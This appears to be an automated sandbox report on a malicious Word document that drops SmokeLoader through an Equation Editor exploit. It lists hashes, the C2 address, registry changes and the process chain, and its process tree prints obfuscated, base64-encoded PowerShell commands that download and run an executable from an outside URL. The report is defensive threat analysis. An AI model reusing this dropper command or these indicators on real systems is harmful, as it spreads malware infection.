Analysis

- max time kernel: 101s
- max time network: 100s
- platform: windows7_x64
- resource: win7v20210410
- submitted: 13-04-2021 09:01
- Static task: static1
- Behavioral task: behavioral1 (Sample: 2021lk049459.doc, Resource: win7v20210410)
- Behavioral task: behavioral2 (Sample: 2021lk049459.doc, Resource: win10v20210408)
General

- Target: 2021lk049459.doc
- Size: 2.2MB
- MD5: 40f9df41effa8762858974452db083d9
- SHA1: fd382c2ae4ad3545b5d198d8c51735045584f8ce
- SHA256: 06b686985f4246819d7fed52a2b9fc1dbed7406d80f902d655866aed61392cbd
- SHA512: f09b0b5415ac3f1c9af5f13774bb01675540a3238ac23301b404f13fb847f62725e7ad03f7de7b0fbecf19c90ee2be53b5e7b09aada12780f7685258b54f58f2
Malware Config

- Extracted (download URL): https://u.teknik.io/bHrgG.jpg
- Extracted (family): smokeloader
  Version: 2018
  C2: http://94.140.114.59/1/
Signatures

- SmokeLoader
  Modular backdoor trojan in use since 2014.
- Blocklisted process makes network request (4 IoCs)
  Processes:
    flow  pid   process
    6     1804  EQNEDT32.EXE
    8     1804  EQNEDT32.EXE
    10    1804  EQNEDT32.EXE
    11    1148  powershell.exe

- Executes dropped EXE (2 IoCs)
  Processes:
    pid   process
    1460  69577.exe
    1528  nTvWNOa.exe

- Loads dropped DLL (3 IoCs)
  Processes:
    pid   process
    1804  EQNEDT32.EXE
    1148  powershell.exe
    1148  powershell.exe
- Maps connected drives based on registry (3 TTPs, 2 IoCs)
  Disk information is often read in order to detect sandboxing environments.
  Processes:
    Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum (nTvWNOa.exe)
    Key value queried: \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 (nTvWNOa.exe)

- Drops file in System32 directory (2 IoCs)
  Processes:
    File opened for modification: C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (powershell.exe)
    File opened for modification: C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (powershell.exe)

- Drops file in Windows directory (1 IoCs)
  Processes:
    File opened for modification: C:\Windows\Debug\WIA\wiatrace.log (WINWORD.EXE)
- Office loads VBA resources, possible macro or embedded object present

- Launches Equation Editor (1 TTPs, 1 IoCs)
  Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

- Modifies Internet Explorer settings (heading restored from the process tree, where it is listed for WINWORD.EXE)
  Processes:
    Key created: \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote (WINWORD.EXE)
    Set value (int): \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" (WINWORD.EXE)
    Key created: \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel (WINWORD.EXE)
    Set value (str): \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" (WINWORD.EXE)
    Set value (str): \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" (WINWORD.EXE)
    Key created: \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt (WINWORD.EXE)
    Set value (int): \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" (WINWORD.EXE)
    Key created: \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar (WINWORD.EXE)
    Set value (str): \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" (WINWORD.EXE)
- Suspicious behavior: AddClipboardFormatListener (1 IoCs)
  Processes:
    pid  process
    452  WINWORD.EXE

- Suspicious behavior: EnumeratesProcesses (4 IoCs)
  Processes:
    pid   process
    740   powershell.exe (2 entries)
    1148  powershell.exe (2 entries)

- Suspicious behavior: MapViewOfSection (2 IoCs)
  Processes:
    pid   process
    1528  nTvWNOa.exe (2 entries)

- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Processes:
    description             pid   process
    Token: SeDebugPrivilege 740   powershell.exe
    Token: SeDebugPrivilege 1148  powershell.exe

- Suspicious use of FindShellTrayWindow (11 IoCs)
  Processes:
    pid   process
    1460  69577.exe (11 entries)

- Suspicious use of SendNotifyMessage (11 IoCs)
  Processes:
    pid   process
    1460  69577.exe (11 entries)

- Suspicious use of SetWindowsHookEx (2 IoCs)
  Processes:
    pid  process
    452  WINWORD.EXE (2 entries)
- Suspicious use of WriteProcessMemory (20 IoCs)
  Processes (source pid/process -> target pid/process; each pair was recorded 4 times):
    452 WINWORD.EXE    -> 1280 splwow64.exe
    1804 EQNEDT32.EXE  -> 1460 69577.exe
    1460 69577.exe     -> 740 powershell.exe
    740 powershell.exe -> 1148 powershell.exe
    1148 powershell.exe -> 1528 nTvWNOa.exe
Processes

- C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE (level 1)
  Command line: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2021lk049459.doc"
  - Drops file in Windows directory
  - Modifies Internet Explorer settings
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

  - C:\Windows\splwow64.exe (level 2)
    Command line: C:\Windows\splwow64.exe 12288

- C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE (level 1)
  Command line: "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
  - Blocklisted process makes network request
  - Loads dropped DLL
  - Launches Equation Editor
  - Suspicious use of WriteProcessMemory

  - C:\Users\Public\69577.exe (level 2)
    Command line: "C:\Users\Public\69577.exe"
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory

    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (level 3)
      Command line: powershell.exe PowERsHEL`l -ExecutionPolicy Bypass -w 1 /`e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwAHMAOgAvAC8AdQAuAHQAZQBrAG4AaQBrAC4AaQBvAC8AYgBIAHIAZwBHAC4AagBwAGcAHSAgACwAIAAdICQARQBOAHYAOgB0AGUAbQBwAFwAbgBUAHYAVwBOAE8AYQAuAGUAeABlAB0gIAApACAAOwAgAHMAdABBAFIAdAAgAB0gJABFAE4AdgA6AHQAZQBtAHAAXABuAFQAdgBXAE4ATwBhAC4AZQB4AGUAHSA=
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (level 4)
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 /e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwAHMAOgAvAC8AdQAuAHQAZQBrAG4AaQBrAC4AaQBvAC8AYgBIAHIAZwBHAC4AagBwAGcAHSAgACwAIAAdICQARQBOAHYAOgB0AGUAbQBwAFwAbgBUAHYAVwBOAE8AYQAuAGUAeABlAB0gIAApACAAOwAgAHMAdABBAFIAdAAgAB0gJABFAE4AdgA6AHQAZQBtAHAAXABuAFQAdgBXAE4ATwBhAC4AZQB4AGUAHSA=
        - Blocklisted process makes network request
        - Loads dropped DLL
        - Drops file in System32 directory
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

        - C:\Users\Admin\AppData\Local\Temp\nTvWNOa.exe (level 5)
          Command line: "C:\Users\Admin\AppData\Local\Temp\nTvWNOa.exe"
          - Executes dropped EXE
          - Maps connected drives based on registry
          - Suspicious behavior: MapViewOfSection
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

- C:\Users\Admin\AppData\Local\Temp\nTvWNOa.exe
  MD5: 3cf58ec9de521b32015552ca3024d1cd
  SHA1: 539236ecd9d859f82f89311bfd564906aa98451e
  SHA256: ae3e0639c29e82ba61932616457bae4100c939c281643dacfaa1bd5ba2dc9ace
  SHA512: 25d7bdc0c80b886bfdbf2d00fac9628899656bf56d6213e0ef75c2bd4f88117f34c7edd6f46caba291f7d64655ff486cb5bbf0fd6f8ea0996525b02b42f78599

- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
  MD5: b4315c84bf5773b6dd43a1261b9b04be
  SHA1: 37f8e667b99a402337f3dd42c6aa3e1d760e8c00
  SHA256: 1838e21fdbcee13750e7b73a738dad458ab7698505097b71002dac30b7a1cc10
  SHA512: f2005209dafbca8c71ac04b4c48a3fd8d5360b81b617e5e47c762093af885e68e29d262a4d86a0eb8ab3d5400dfb3011897d4059ab1084248479e2bf4662dd1f

- C:\Users\Public\69577.exe
  MD5: 2c2cb2aa0782874d3c14cdd6f063f979
  SHA1: 583c43ca939f9d8a4eea53a7d71157ac3571a350
  SHA256: c508cefc2d6430d8be028c7224aac6641e0da4f072e503261b32b950e0ef21da
  SHA512: 34c35989b80841ce09672856ad8c52475a2fa96da1004a61d2417241a25c12e108439f1c7e4851f125ea6af412e96487da793213f63feebb5ffed8f3a97c9d26
- \Users\Admin\AppData\Local\Temp\nTvWNOa.exe
  MD5: 3cf58ec9de521b32015552ca3024d1cd
  SHA1: 539236ecd9d859f82f89311bfd564906aa98451e
  SHA256: ae3e0639c29e82ba61932616457bae4100c939c281643dacfaa1bd5ba2dc9ace
  SHA512: 25d7bdc0c80b886bfdbf2d00fac9628899656bf56d6213e0ef75c2bd4f88117f34c7edd6f46caba291f7d64655ff486cb5bbf0fd6f8ea0996525b02b42f78599
- \Users\Public\69577.exe
  MD5: 2c2cb2aa0782874d3c14cdd6f063f979
  SHA1: 583c43ca939f9d8a4eea53a7d71157ac3571a350
  SHA256: c508cefc2d6430d8be028c7224aac6641e0da4f072e503261b32b950e0ef21da
  SHA512: 34c35989b80841ce09672856ad8c52475a2fa96da1004a61d2417241a25c12e108439f1c7e4851f125ea6af412e96487da793213f63feebb5ffed8f3a97c9d26